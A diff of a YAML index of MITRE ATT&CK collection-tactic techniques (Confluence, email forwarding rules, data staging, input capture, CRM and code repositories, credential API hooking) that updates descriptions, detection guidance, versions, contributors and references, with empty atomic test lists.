       name: Confluence
       description: |2
 
@@ -41005,31 +41541,48 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
 
         User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
+      created: '2020-02-14T13:09:51.004Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/001
+        external_id: T1213.001
+      - source_name: Atlassian Confluence Logging
+        description: Atlassian. (2018, January 9). How to Enable User Access Logging.
+          Retrieved April 4, 2018.
+        url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1114.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Email Forwarding Rule'
       description: "Adversaries may setup email forwarding rules to collect sensitive
         information. Adversaries may abuse email forwarding rules to monitor the activities
@@ -41062,10 +41615,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Security
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
       - Liran Ravich, CardinalOps
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
@@ -41074,16 +41629,17 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
+      - 'Cloud Service: Cloud Service Metadata'
       type: attack-pattern
       id: attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0
       created: '2020-02-19T18:54:47.103Z'
@@ -41115,70 +41671,66 @@ collection:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.003
     atomic_tests: []
   T1074:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      - Shane Tully, @securitygypsy
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
-      created: '2017-05-31T21:30:58.938Z'
-      x_mitre_version: '1.4'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074
-        url: https://attack.mitre.org/techniques/T1074
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: PWC Cloud Hopper April 2017
-        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
-        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
-          April 5, 2017.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-30T13:28:37.415Z'
+      name: Data Staged
       description: |-
         Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017)
 
         In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
 
         Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
-      modified: '2022-11-08T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Data Staged
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      - Shane Tully, @securitygypsy
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e
+      created: '2017-05-31T21:30:58.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074
+        external_id: T1074
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: PWC Cloud Hopper April 2017
+        description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved
+          April 5, 2017.
+        url: https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.002:
     technique:
@@ -41251,7 +41803,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.002
     atomic_tests: []
   T1039:
@@ -41306,12 +41857,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1039
     atomic_tests: []
   T1114.002:
     technique:
-      modified: '2023-05-31T12:34:03.420Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Email Collection: Remote Email Collection'
       description: Adversaries may target an Exchange server, Office 365, or Google
         Workspace to collect sensitive information. Adversaries may leverage a user's
@@ -41323,6 +41873,9 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for unusual login activity from unknown or abnormal
         locations, especially for privileged accounts (ex: Exchange administrator
@@ -41330,11 +41883,11 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - Windows
-      - Google Workspace
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41351,14 +41904,11 @@ collection:
         external_id: T1114.002
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1114.002
     atomic_tests: []
   T1056:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-08-13T17:33:45.244Z'
       name: Input Capture
       description: Adversaries may use methods of capturing user input to obtain credentials
         or collect information. During normal system usage, users often provide credentials
@@ -41374,6 +41924,7 @@ collection:
         phase_name: credential-access
       x_mitre_contributors:
       - John Lambert, Microsoft Threat Intelligence Center
+      x_mitre_deprecated: false
       x_mitre_detection: 'Detection may vary depending on how input is captured but
         may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
         `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
@@ -41382,13 +41933,13 @@ collection:
         keylogging or API hooking are present.'
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.2'
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -41396,15 +41947,11 @@ collection:
       - 'Process: Process Metadata'
       - 'Process: OS API Execution'
       - 'Driver: Driver Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      - root
-      - User
       type: attack-pattern
       id: attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2
       created: '2017-05-31T21:30:48.323Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056
@@ -41415,9 +41962,60 @@ collection:
         url: http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1213.004:
+    technique:
+      modified: '2024-10-17T14:36:24.983Z'
+      name: Customer Relationship Management Software
+      description: |-
+        Adversaries may leverage Customer Relationship Management (CRM) software to mine valuable information. CRM software is used to assist organizations in tracking and managing customer interactions, as well as storing customer data.
+
+        Once adversaries gain access to a victim organization, they may mine CRM software for customer data. This may include personally identifiable information (PII) such as full names, emails, phone numbers, and addresses, as well as additional details such as purchase histories and IT support interactions. By collecting this data, an adversary may be able to send personalized [Phishing](https://attack.mitre.org/techniques/T1566) emails, engage in SIM swapping, or otherwise target the organization’s customers in ways that enable financial gain or the compromise of additional organizations.(Citation: Bleeping Computer US Cellular Hack 2022)(Citation: Bleeping Computer Mint Mobile Hack 2021)(Citation: Bleeping Computer Bank Hack 2020)
+
+        CRM software may be hosted on-premises or in the cloud. Information stored in these solutions may vary based on the specific instance or environment. Examples of CRM software include Microsoft Dynamics 365, Salesforce, Zoho, Zendesk, and HubSpot.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Centre for Cybersecurity Belgium (CCB)
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Logon Session: Logon Session Creation'
+      - 'Application Log: Application Log Content'
+      type: attack-pattern
+      id: attack-pattern--bbfbb096-6561-4d7d-aa2c-a5ee8e44c696
+      created: '2024-07-01T20:06:13.664Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/004
+        external_id: T1213.004
+      - source_name: Bleeping Computer Bank Hack 2020
+        description: Ionut Ilascu. (2020, January 16). Customer-Owned Bank Informs
+          100k of Breach Exposing Account Balance, PII. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/customer-owned-bank-informs-100k-of-breach-exposing-account-balance-pii/
+      - source_name: Bleeping Computer Mint Mobile Hack 2021
+        description: Lawrence Abrams. (2021, July 10). Mint Mobile hit by a data breach
+          after numbers ported, data accessed. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/mint-mobile-hit-by-a-data-breach-after-numbers-ported-data-accessed/
+      - source_name: Bleeping Computer US Cellular Hack 2022
+        description: Sergiu Gatlan. (2022, January 4). UScellular discloses data breach
+          after billing system hack. Retrieved July 1, 2024.
+        url: https://www.bleepingcomputer.com/news/security/uscellular-discloses-data-breach-after-billing-system-hack/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1557.002:
     technique:
@@ -41463,7 +42061,7 @@ collection:
         The ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)
 
         Adversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-22T18:37:22.176Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: ARP Cache Poisoning
       x_mitre_detection: "Monitor network traffic for unusual ARP traffic, gratuitous
@@ -41482,37 +42080,36 @@ collection:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.003:
     technique:
-      modified: '2022-10-18T22:44:01.723Z'
+      modified: '2024-09-04T13:03:54.101Z'
       name: Code Repositories
       description: |-
         Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.
 
-        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
+        Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code.  Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)
 
         **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Toby Kohlenberg
+      - Josh Liburdi, @jshlbrd
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor access to code repositories, especially performed
         by privileged users such as Active Directory Domain or Enterprise Administrators
         as these types of accounts should generally not be used to access code repositories.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user-based anomalies.
-      x_mitre_platforms:
-      - SaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Toby Kohlenberg
-      - Josh Liburdi, @jshlbrd
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - SaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -41535,41 +42132,52 @@ collection:
         url: https://krebsonsecurity.com/2013/10/adobe-to-announce-source-code-customer-data-breach/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213:
     technique:
-      modified: '2024-03-01T16:27:47.391Z'
+      modified: '2024-10-28T19:10:16.960Z'
       name: Data from Information Repositories
       description: "Adversaries may leverage information repositories to mine valuable
         information. Information repositories are tools that allow for storage of
         information, typically to facilitate collaboration or information sharing
         between users, and can store a wide variety of data that may aid adversaries
-        in further objectives, or direct access to the target information. Adversaries
-        may also abuse external sharing features to share sensitive documents with
-        recipients outside of the organization. \n\nThe following is a brief list
-        of example information that may hold potential value to an adversary and may
-        also be found on an information repository:\n\n* Policies, procedures, and
-        standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
-        Technical system documentation\n* Testing / development credentials\n* Work
-        / project schedules\n* Source code snippets\n* Links to network shares and
-        other internal resources\n\nInformation stored in a repository may vary based
-        on the specific instance or environment. Specific common information repositories
-        include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
-        and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
-        services such as Code Repositories, IaaS databases, enterprise databases,
-        and other storage infrastructure such as SQL Server."
+        in further objectives, such as Credential Access, Lateral Movement, or Defense
+        Evasion, or direct access to the target information. Adversaries may also
+        abuse external sharing features to share sensitive documents with recipients
+        outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+        \n\nThe following is a brief list of example information that may hold potential
+        value to an adversary and may also be found on an information repository:\n\n*
+        Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+        System architecture diagrams\n* Technical system documentation\n* Testing
+        / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+        \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+        and other internal resources\n* Contact or other sensitive information about
+        business partners and customers, including personally identifiable information
+        (PII) \n\nInformation stored in a repository may vary based on the specific
+        instance or environment. Specific common information repositories include
+        the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+        and more specialized platforms such as customer relationship management (CRM)
+        databases \n* Collaboration platforms such as SharePoint, Confluence, and
+        code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+        \n\nIn some cases, information repositories have been improperly secured,
+        typically by unintentionally allowing for overly-broad access by all users
+        or even public access to unauthenticated users. This is particularly common
+        with cloud-native or cloud-hosted services, such as AWS Relational Database
+        Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+        Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Regina Elwell
       - Praetorian
       - Milos Stojadinovic
       - Isif Ibrahima, Mandiant
+      - Obsidian Security
+      - Naveen Vijayaraghavan
+      - Nilesh Dherange (Gurucul)
       x_mitre_deprecated: false
       x_mitre_detection: "As information repositories generally have a considerably
         large user base, detection of malicious use can be non-trivial. At minimum,
@@ -41598,10 +42206,9 @@ collection:
       - Windows
       - macOS
       - SaaS
-      - Office 365
-      - Google Workspace
       - IaaS
-      x_mitre_version: '3.3'
+      - Office Suite
+      x_mitre_version: '3.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -41614,10 +42221,20 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1213
         external_id: T1213
+      - source_name: Mitiga
+        description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+          I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+          Retrieved September 24, 2024.
+        url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
       - source_name: Atlassian Confluence Logging
         description: Atlassian. (2018, January 9). How to Enable User Access Logging.
           Retrieved April 4, 2018.
         url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+      - source_name: TrendMicro Exposed Redis 2020
+        description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+          Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+          September 25, 2024.
+        url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
       - source_name: Microsoft SharePoint Logging
         description: Microsoft. (2017, July 19). Configure audit settings for a site
           collection. Retrieved April 4, 2018.
@@ -41626,11 +42243,14 @@ collection:
         description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
           8, 2021.
         url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+      - source_name: Cybernews Reuters Leak 2022
+        description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+          and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+        url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1602.001:
     technique:
@@ -41667,7 +42287,7 @@ collection:
         description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
           of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
           19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T01:54:22.812Z'
       name: SNMP (MIB Dump)
       description: "Adversaries may target the Management Information Base (MIB) to
         collect and/or mine valuable information in a network managed using Simple
@@ -41699,115 +42319,182 @@ collection:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1056.004:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-08-27T21:03:56.385Z'
+      name: 'Input Capture: Credential API Hooking'
+      description: |
+        Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001),  this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+        * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+        * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+        * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: |-
+        Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+        Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+        Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
+      x_mitre_data_sources:
+      - 'Process: Process Metadata'
+      - 'Process: OS API Execution'
       type: attack-pattern
+      id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
       created: '2020-02-11T19:01:15.930Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1056.004
         url: https://attack.mitre.org/techniques/T1056/004
+        external_id: T1056.004
+      - source_name: EyeofRa Detecting Hooking June 2017
+        description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+          against user-land. Retrieved December 12, 2017.'
+        url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+      - source_name: Zairon Hooking Dec 2006
+        description: Felici, M. (2006, December 6). Any application-defined hook procedure
+          on my machine?. Retrieved December 12, 2017.
+        url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+      - source_name: GMER Rootkits
+        description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+        url: http://www.gmer.net/
+      - source_name: MWRInfoSecurity Dynamic Hooking 2015
+        description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+          Mode. Retrieved December 20, 2017.'
+        url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+      - source_name: Elastic Process Injection July 2017
+        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+          A Technical Survey Of Common And Trending Process Injection Techniques.
+          Retrieved December 7, 2017.'
